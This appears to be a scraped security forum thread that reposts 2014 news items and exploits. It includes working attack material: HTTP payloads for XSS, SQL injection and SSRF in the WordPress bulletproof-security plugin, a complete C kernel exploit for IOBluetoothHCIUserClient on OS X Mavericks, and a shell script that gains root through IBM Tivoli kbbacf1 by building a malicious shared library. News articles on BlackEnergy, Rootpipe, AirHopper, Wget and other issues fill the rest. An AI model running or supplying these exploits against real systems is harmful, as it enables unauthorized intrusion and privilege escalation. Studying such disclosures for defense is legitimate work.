Vulnerability title: Wordpress bulletproof-security <=.51 multiple vulnerabilities Author: Pietro Oliva CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749 Vendor: AITpro Product: bulletproof-security Affected version: bulletproof-security <= .51 Vulnerabilities fixed in version: .51.1 Details: xss vulnerability (CVE-2014-7958): POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account SQL injection vulnerability (CVE-2014-7959, correct db username and password is required in order to exploit this): POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account SSRF vulnerability (CVE-2014-8749) POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account Possible scenario: - the user sends a request with username, password, host and other parameters to the vulnerable page - the server doesn't check the host parameter to be in a whitelist of permitted databases - the server performs an authentication request to a remote or internal network database and gives back to the attacker the authentication result -After n attemps the attacker has bypassed access restrictions (if any) to the remote database, discovered the remote database password, and made it appear bulletproof-security as the source of the attack. Extra step: -If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker could also execute arbitrary sql statement on the remote server, as the vulnerable page executes a query if the authentication is successful (without filtering or use prepared statements). The source of the attack would appear to be the bulletproof-security vulnerable site. Source: WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF ? Packet Storm

/* * pwn.c, by @rpaleari and @joystick * * This PoC exploits a missing sign check in * IOBluetoothHCIUserClient::SimpleDispatchWL(). * * Tested on Mac OS X Mavericks (10.9.4/10.9.5). * * Compile with: gcc -Wall -o pwn{,.c} -framework IOKit * */ #include <stdio.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> uint64_t payload() { /* Your payload goes here. */ } int main(void) { /* Map our landing page (kernel will jump at tgt+7) */ vm_address_t tgt = 0x0000048800000000; vm_allocate(mach_task_self(), &tgt, 0x1000, 0); vm_protect(mach_task_self(), tgt, 0x1000, 0, VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE); memset((void *)tgt, 0, 0x1000); /* Prepare payload */ char *target = (char *)tgt; /* mov rax, payload */ target[7] = 0x48; target[8] = 0xb8; *((uint64_t *)(&target[9])) = (uint64_t) payload; /* jmp rax */ target[17] = 0xff; target[18] = 0xe0; printf(" [+] Payload function @ %016llx\n", (uint64_t) payload); printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7); /* Find the vulnerable service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to the vulnerable service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); /* The first 8 bytes must be 0, so we don't have to handle following parameters */ char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00" /* Don't really matter for the exploit (ignored due to the 0s above) */ "\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86" "\x80\xff\xff\xff" /* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May need to be adjusted on other Mavericks versions. */ "\xa8\xb6\xf5\xff\x80\xff\xff\xff"; printf(" [+] Launching exploit!\n"); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ /* Exec shell here after payload returns */ return IOServiceClose(port); }

Security researchers at Kaspersky Lab have unearthed new capabilities in the BlackEnergy Crimeware weapon that has now ability to hacking routers, Linux systems and Windows, targeting industry through Cisco network devices. The antivirus vendor’s Global Research & Analysis Team released a report Monday detailing some of the new “relatively unknown” custom plug-in capabilities that the cyber espionage group has developed for BlackEnergy to attack Cisco networking devices and target ARM and MIPS platforms. The malware was upgraded with custom plugins including Ciscoapi.tcl which targets The Borg's kit, and According to researchers, the upgraded version contained various wrappers over Cisco EXEC-commands and "a punchy message for Kaspersky," which reads, "F*uck U, Kaspersky!!! U never get a fresh B1ack En3rgy. So, thanks C1sco 1td for built-in backd00rs & 0-days." BlackEnergy malware program was originally created and used by cybercriminals to launch Distributed Denial-of-Service (DDoS) attacks. The malware developer then added some custom plugins used to funnel banking information. Most recently BlackEnergy malware was observed in alleged state-sponsored attacks targeting the North Atlantic Treaty Organization (NATO), Ukrainian and Polish government agencies, and a variety of sensitive European industries over the last year. Now, the cyber espionage group has enhanced the malware program which also has the capabilities like port scanning, password stealing, system information gathering, digital certificate theft, remote desktop connectivity and even hard disk wiping and destroying. In case if a victim knew of the BlackEnergy infection on their system, the attacker activates "dstr," the name of a plugin that destroys hard disks by overwriting them with random data. A second victim was compromised by using VPN credentials taken from the first victim. Security researchers, Kurt Baumgartner and Maria Garnaeva, also came across BlackEnergy version that works on ARM and MIPS based systems and found that it has compromised networking devices manufactured by Cisco Systems. However, the experts are not sure for the purpose of some plugins, including one that gathers device instance IDs and other information on connected USB drives and another that collects details on the BIOS (Basic Input/Output System), motherboard, and processor of infected systems. Multiple unnamed victim companies in different countries were targeted with the latest BlackEnergy malware, including victims in Russia, Germany, Belgium, Turkey, Libya, Vietnam and several other countries. Another Crimeware group, the Sandworm Team, believed to have used the BlackEnergy exclusively throughout 2014 at victim sites and included custom plugin and scripts of their own. Also last month, the Sandworm Team had targeted organizations across the world in an espionage campaign, and iSIGHT Partners revealed that the team used spear phishing as the major attack vector to victimize their targets. Surs?: http://thehackernews.com/2014/11/blackenergy-crimeware-router-linux.html

Google introduced a new security tool to help developers detect bugs and security glitches in the network traffic security that may leave passwords and other sensitive information open to snooping. The open source tool, dubbed as Nogotofail, has been launched by the technology giant in sake of a number of vulnerabilities discovered in the implementation of the transport layer security, from the most critical Heartbleed bug in OpenSSL to the Apple's gotofail bug to the recent POODLE bug in SSL version 3. The company has made the Nogotofail tool available on GitHub, so that so anyone can test their applications, contribute new features to the project, provide support for more platforms, and help improve the security of the internet. Android security engineer Chad Brubaker said that the Nogotofail main purpose is to confirm that internet-connected devices and applications aren't vulnerable to transport layer security (TLS) and Secure Sockets Layer (SSL) encryption issues. The network security testing tool includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library vulnerabilities and misconfigurations, SSL and STARTTLS stripping issues, and clear text traffic issues, and more. Nogotofail tool, written by Android engineers Chad Brubaker, Alex Klyubin and Geremy Condra, works on devices running Android, iOS, Linux, Windows, Chrome OS, OS X, and “in fact any device you use to connect to the Internet.” The tool can be deployed on a router, a Linux machine, or a VPN server. The company says it has been using the Nogotofail tool internally for "some time" and has worked with developers to improve the security of their apps before releasing it. "But we want the use of TLS/SSL to advance as quickly as possible," Brubaker said. The Nogotofail tool requires Python 2.7 and pyOpenSSL>=0.13. It features an on-path network Man-in-the-Middle (MiTM), designed to work on Linux machines, as well and optional clients for the devices being tested. Surs?: http://thehackernews.com/2014/11/nogotofail-Network-Security-Testing-Tool.html

A Swedish Security researcher has discovered a critical vulnerability in Apple’s OS X Yosemite that gives hackers the ability to escalate administrative privileges on a compromised machine, and allows them to gain the highest level of access on a machine, known as root access. The vulnerability, dubbed as "Rootpipe", was uncovered by Swedish white-hat hacker Emil Kvarnhammar, who is holding on the full details about the privilege escalation bug until January 2015, as Apple needs some time to prepare a security patch. By exploiting the vulnerability in the Mac OS X Yosemite, an attacker could bypass the usual safeguard mechanisms which are supposed to stop anyone who tries to root the operating system through a temporary backdoor. ROOT ACCESS WITHOUT PASSWORD Once exploited, hackers could install malicious software or make other changes to your computer without any need of a password. Hackers could steal victims’ sensitive information such as passwords or bank account information, or if required, they could format the entire affected computer, deleting all your important data from the computer. Kvarnhammar has also provided a video to explain his initial finding. Kvarnhammar tested the vulnerability on OS X version 10.8, 10.9 and 10.10. He has confirmed that it has existed since at least 2012, but probably is much older than that. INFORMED APPLE Kvarnhammar contacted Apple about the issue but he initially didn’t get any response, and Apple silently asked him for more details. When he provided with the details, Apple asked TrueSec not to disclose until next January. HOW TO PROTECT The full disclosure of the vulnerability would be made public in January, after Apple will provide a fix. Apple Yosemite OS X users are advised to follow the below steps in order to protect yourself from the exploitation of the Rootpipe: Avoid running the system on a daily basis with an admin account. An attacker that will gain control on this account will obtain anyway limited privileges. Use volume encryption Apple’s FileVault tool, which allows encryption and decryption on the fly, protecting your information always. However, the best way to protect yourself from such security vulnerabilities is to ensure that the operating system running on your system is always up-to-date, and always be careful to the links and documents others send to you. Surs?: http://thehackernews.com/2014/11/rootpipe-critical-mac-os-x-yosemite.html

In order to secure sensitive information such as Finance, many companies and government agencies generally use totally secure computer systems by making sure it aren't connected to any network at all. But the most secure systems aren't safe anymore. Security researchers at the Cyber Security Labs at Ben Gurion University in Israel have found a way to snoop on a personal computer even with no network connection. STEALING DATA USING RADIO SIGNALS Researchers have developed a proof-of-concept malware that can infiltrate a closed network to lift data from a machine that has been kept completely isolated from the internet or any Wi-Fi connection by using little more than a mobile phone’s FM radio signals. Researcher Mordechai Guri, along with Professor Yuval Elovici of Ben Gurion University, presented the research on Thursday in the 9th IEEE International Conference on Malicious and Unwanted Software (MALCON 2014) held at Denver. This new technology is known as ‘AirHopper’ — basically a keylogger app to track what is being typed on the computer or the mobile phone. AirHopper is a special type of keylogger because it uses radio frequencies to transmit data from a computer, all by exploiting the computer's monitor display, in order to evade air-gap security measures. HOW DOES AIRHOPPER WORK ? The technology works by using the FM radio receiver included in some mobile phones. AirHopper is able to capture keystrokes by intercepting certain radio emissions from the monitor or display unit of the isolated computer. The researchers can then pick up the FM signals on a nearby smartphone and translate the FM signals into the typed text. LIMITATIONS The technique is completely new, although it has some limitations. The team claims that textual and binary information can be gathered from a distance of up to 7 meters with an effective FM-bandwidth of 13-60 bps (bytes per second). This, according to researchers, is enough to steal a secret password. Therefore, in an effort to obtain secret data an attacker can infect a mobile phone of someone from the staff using AirHopper method worked in stealth mode, and then transmit the data. VIDEO DEMONSTRATION AND POTENTIAL DANGER Researchers have also provide the Proof-of-concept video, so you can Watch the demonstration video and find out if you should be worried or not. According to the researchers, the Airhopper technique of data theft was developed by the University in order to protect against potential intrusions of its kind in the future. "Such technique can be used potentially by people and organizations with malicious intentions and we want to start a discussion on how to mitigate this newly presented risk." said Dudu Mimran, chief technology officer of the Ben Gurion University’s cyber security labs. Surs?: AirHopper — Hacking Into an Isolated Computer Using FM Radio Signals

IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation #!/bin/sh # Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit # CVE: CVE-2013-5467 # Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni # Author: Robert Jaroszuk # Tested on: RedHat 5, Centos 5 # Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested) # echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk" echo "[+] Preparing the code..." cat > kbbacf1-pwn.c << DONE #define _GNU_SOURCE #include <unistd.h> #include <stdlib.h> #include <dlfcn.h> void __cxa_finalize (void *d) { return; } void __attribute__((constructor)) init() { setresuid(geteuid(), geteuid(), geteuid()); execl("/bin/sh", (char *)NULL, (char *)NULL); } DONE cat > version << DONE GLIBC_2.2.5 { }; GLIBC_2.3 { }; GLIBC_2.3.2 { }; GLIBC_PRIVATE { }; DONE echo "[+] Preparing the code... part2" /usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c echo "[+] Cleaning up..." /bin/rm -f kbbacf1-pwn.c version echo "[+] Exploiting." /opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1

If you own a Sony smartphone either the Android 4.4.2 or 4.4.4 KitKat firmware then inadvertently you may be transmitting your data back to the servers in China, even if you haven’t installed any application. Quite surprising but it’s true. I know many of you haven’t expected such practices from a Japanese company, but reports popping up at several forums suggest that some new Sony Xperia handsets seem to contain the Baidu spyware. MYSTERIOUS BAIDU SPYWARE About a month ago, a group of community users of Sony smartphone detected the presence of a strange folder, named “Baidu”, mysteriously appeared from among those present in various versions of Android for these handsets. The creepy part is that the folder is created automatically without the owners permission and there is no way of deleting it. Even if someone tries to remove it, it instantly reappears as well as unticking the folder from device administrator equally seems to do nothing, neither does starting the phone in Safe Mode. The Baidu folder appears to be created by Sony’s ‘my Xperia’ service each time a connection is made and is reported to be sending pings to China. There is no further information known on what these pings are transmitting but nevertheless they do seem to be transmitting. PERSONAL INFORMATION SEND TO CHINA Going deep, several users reported they found that the Chinese government is able to detect the status and identity of the device, take pictures and make videos without the consent of the user. A user, going by the handle Elbird, posted on Sony Forums that with the help of Baidu folder, the Chinese Government can: Read status and identity of your device Make pictures and videos without your knowledge Get your exact location Read the contents of your USB memory Read or edit accounts Change security settings Completely manage your network access Couple with bluetooth devices Know what apps you are using Prevent your device from entering sleep mode Change audio settings Change system settings AFFECTED PRODUCTS Thankfully this is a spyware and you can check to see if you have or not. If you see the folder named Baidu in your device then your device contains the spyware. But, for users it isn't the folder which seems to be the real cause for concern, though; it’s the fact that the phones open a connection to servers. According to the reports affected devices include the new Sony Xperia Z3 and Z3 Compact, and several users from the Reddit community have also reported about the presence of this folder on their mobile phones, too — and not necessarily phones made by Sony. One owns an HTC One M7, another an HTC One X, a few others the OnePlus One. STEPS TO DISABLE BAIDU SPYWARE Backup your important data and factory reset the device. Turn on the device and go to Settings -> Apps -> Running and Force stop both “MyXperia” apps. Then remove the baidu folder using File Kommander app. Go to Settings -> About Phone -> Click 7 times on the Build Number to enable developer mode. Download or Install the Android SDK on your computer and then connect the Sony device to it using USB cable. Run the adb tool terminal : adb shell In adb shell, type the command: pm block com.sonymobile.mx.android Exit adb shell Reboot the device. Note that the spyware does not necessarily affect the process or functionality of your mobile devices, so you shouldn't be worried in this respect. Sony has not officially responded to this ‘baidu’ folder issue. However, the company has recognized the issue and has said that in the next release the problem will be fixed. Unless Sony can roll out some kind of fix in the near future then it seems you might have to wait until Lollipop rolls out in January before you can get rid of Baidu. Recently Chinese smartphone manufacturer Xiaomi has been called out for spying on personal user data using their smartphones. According to F-Secure Xiaomi Smartphones were sending user data back to the servers based in China. Surs?: Sony Xperia Devices Secretly Sending User Data to Servers in China

The open-source Wget application which is most widely used on Linux and Unix systems for retrieving files from the web has found vulnerable to a critical flaw. GNU Wget is a command-line utility designed to retrieve files from the Web using HTTP, HTTPS, and FTP, the most widely used Internet protocols. Wget can be easily installed on any Unix-like system and has been ported to many environments, including Microsoft Windows, Mac OS X, OpenVMS, MorphOS and AmigaOS. When a recursive directory fetch over FTP server as the target, it would let an attacker "create arbitrary files, directories or symbolic links" due to a symlink flaw. IMPACT OF SYMLINK ATTACK A remote unauthenticated malicious FTP server connected to the victim via wget would allow attackers to do anything they wanted. Wget could download and create or overwrite existing files within the context of the user running wget. The vulnerability was first reported to the GNU Wget project by HD Moore, chief research officer at Rapid7. and is publicly identified as CVE-2014-4877. The flaw is considered critical since wget is present on nearly every Linux server in the world, and is installable (although not by default) on OS X machines as well, so needs a patch as soon as possible. PATCH AVAILABLE The vulnerability has now been fixed by the Wget project in wget 1.16, which blocks the default setting that allowed the setting of local symlinks. WORKAROUND AVAILABLE EXPLOIT An exploit for the vulnerability is now available on the open-source Metasploit penetration testing Website, so that security researchers could test the bug. You can download the exploit from here. Surs?: CVE-2014-4877: Wget FTP Symlink Attack Vulnerability

OFF: Eu votez cu @Nytro ! Al?ii v?d c? au votat cu Chuck Norris sau Vlad ?epes.

The National Institute of Standards and Technology (NIST) is warning users of a newly discovered Zero-Day flaw in the Samsung Find My Mobile service, which fails to validate the sender of a lock-code data received over a network. The Find My Mobile feature implemented by Samsung in their devices is a mobile web-service that provides samsung users a bunch of features to locate their lost device, to play an alert on a remote device and to lock remotely the mobile phone so that no one else can get the access to the lost device. The vulnerability in Samsung’s Find My Mobile feature was discovered by Mohamed Abdelbaset Elnoby (@SymbianSyMoh), an Information Security Evangelist from Egypt. The flaw is a Cross-Site Request Forgery (CSRF) that could allow an attacker to remotely lock or unlock the device and even make the device rings too. Cross-Site Request Forgery (CSRF or XSRF) is an attack that tricks the victim into loading a page that contains a specially crafted HTML exploit page. Basically, an attacker will use CSRF attack to trick a victim into clicking a URL link that contains malicious or unauthorized requests. The malicious link have the same privileges as the authorized user to perform an undesired task on the behalf of the victim, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attack generally targets functions that cause a state change on the server but it can also be used to access victim’s sensitive data. Elnoby said.The researcher has also provided a proof-of-concept (POC) video that will give you a detail explanation on How the researcher made the attack work on Samsung’s Find My Mobile feature. According to the researcher, the first attack to remotely lock victim’s device is critical if exploited because the attackers are able to lock victim’s device with a lock code of their own choice, forcing the victim to do a recovery for the lock code with his Google Account. The US-CERT/NIST identified the vulnerability in the Samsung Find My Mobile as CVE-2014-8346 and rated the severity of the flaw as HIGH, whereas the exploitability score of the flaw is 10.0. Surs?: Samsung 'Find My Mobile' Flaw Allows Hacker to Remotely Lock Your Device

It seems that there is no end to the Windows zero-days, as recently Microsoft patched three zero-day vulnerabilities in Windows which were actively exploited in the wild by hackers, and now a new Zero-day vulnerability has been disclosed affecting all supported releases of Windows operating system, excluding Windows Server 2003. Microsoft has issued a temporary security fix for the flaw and also confirmed that the zero-day flaw is being actively exploited by the hackers through limited, targeted attacks using malicious Microsoft PowerPoint documents sent as email attachments. According to the Microsoft Security Advisory published on Tuesday, the zero-day resides within the operating system’s code that handles OLE (object linking and embedding) objects. OLE technology is most commonly used by Microsoft Office for embedding data from, for example, an Excel spreadsheet in a Word document. The vulnerability (designated as CVE-2014-6352) is triggered when a user is forced to open a PowerPoint files containing a malicious Object Linking and Embedding (OLE) object. For now on, only PowerPoint files are used by hackers to carry out attacks, but all Office file types can also be used to carry out same attack. By gaining same rights as a logged-in user, an attacker could infect victim’s computer by installing other malicious programs on it. According to the software giant, some attacks that compromise accounts without administrator rights may pose less of a risk. Microsoft has released a Fix it "OLE packager Shim Workaround" which will stop the known PowerPoint attacks. But it is not capable to stop other attacks that might be built to exploit this vulnerability. Also, the Fix it is not available for 64-bit editions of PowerPoint on x64-based editions of Windows 8 and Windows 8.1. Meanwhile, Microsoft also urged Windows users to pay attention to the User Account Control (UAC) prompt, a pop-up alerts that require authorization before the OS is allowed to perform various tasks, which would warn a user once the exploit starts to trigger – asking permission to execute. But, users many times see it as an inconvenience and many habitually click through without a second thought. Furthermore, Redmond didn't mention an out-of-band patch for the Zero-Day vulnerability, nor did it mention if a patch would be ready by November Security Patch update. Earlier this month, Microsoft released eight security bulletins, as part of its monthly patch update, fixing three zero-day flaws at the same time. One of which (CVE-2014-4114) was discovered by iSight partners in all supported versions of Microsoft Windows and Windows Server 2008 and 2012 that was being exploited in the "Sandworm" cyberattack to penetrate major corporations' networks. Surs?: Microsoft PowerPoint Vulnerable to Zero-Day Attack

Apple iCloud users in China are not safe from the hackers — believed to be working for Chinese government — who are trying to wiretap Apple customers in the country. Great Fire, a reputed non-profit organization that monitors Internet censorship in China, claimed that the Chinese authorities have launched a nationwide Man in the Middle (MITM) campaign against users of Apple’s iCloud service, designed to steal users' login credentials and access private data. MAN-IN-THE-MIDDLE ATTACK The attacks on the iCloud service was first reported on Saturday and come as Apple begins the official rollout of its latest launched iPhone 6 and 6 Plus on the Chinese mainland. If we talk about less publicized but more danger, Man-in-the-Middle (MitM) attack is the most common one. By attempting MitM attack, a potential attacker could intercept users’ internet communication, steal sensitive information and even hijack sessions. ACCESS TO CREDENTIALS AND ALL PERSONAL DATA Using MITM attack, unknown hackers insinuated their own website, with fake certificate and Domain Name Service address for the iCloud service, between users and Apple's iCloud server, which allowed them to intercept data and potentially gain access to passwords, iMessages, photos and contacts. However, Apple’s iCloud uses SSL security standard to encrypt the connections between its users and Apple's iCloud server, but the company’s SSL certificate is replaced by the intruders for a self-signed one that deceived Web browsers with false information, allowing the cyber criminals to decrypt the connections. The attack on iCloud users in China is an effort to help the government bypass the enhanced security features of the latest iPhone devices by compromising their iCloud usernames and passwords and allowing the authorities to gain access to cloud-stored content such as phone backups, according to the Chinese Internet freedom advocacy group GreatFire.org. GreatFire.org is the same group who previously reported a similar attack when Beijing apparently launched MITM attacks against Github, Google and more recently, Yahoo, in what was seen as an attempt to censor information on the Hong Kong protests. HOW YOU CAN PROTECT YOURSELF In order to protect yourself from personal data breach, Apple users in China are advised to visit iCloud.com only via browsers like Chrome and Firefox, as these competent browsers will detect the inappropriate certificate and flag any MITM attempts. Using a VPN would get around the problem too, but only if you can use one safely behind the Great Firewall. Other softwares — including the popular Qihoo 360 ‘secure’ browser by Chinese biz Qihoo — will gobble up the dodgy certificate without warning. To aware users of the fake certs, Greatfire.og has also published the connection log, traceroutes, wirecapture data, and a copy of the dodgy certificate. Apple users are also advised to turn on the Two-step authentication on their iDevices, because using two-step verification would prevent the hijacking of the already compromised accounts. It isn't clear that the Chinese government is behind the attacks, but it may be connected to the ongoing political protests taking place in Hong Kong. When it comes to security, Apple takes their security seriously. Apple faced series of embarrassing privacy breaches in past few months in which icloud accounts of high-profile celebrities were accessed by the intruders and some of the celebrities’ nude photos were leaked online by hackers, who posted them on different websites. Apple has not commented on the report at time of publication, but as soon as any response from the company will be received, we’ll update the story. Surs?: Chinese Government Executes MITM Attack against iCloud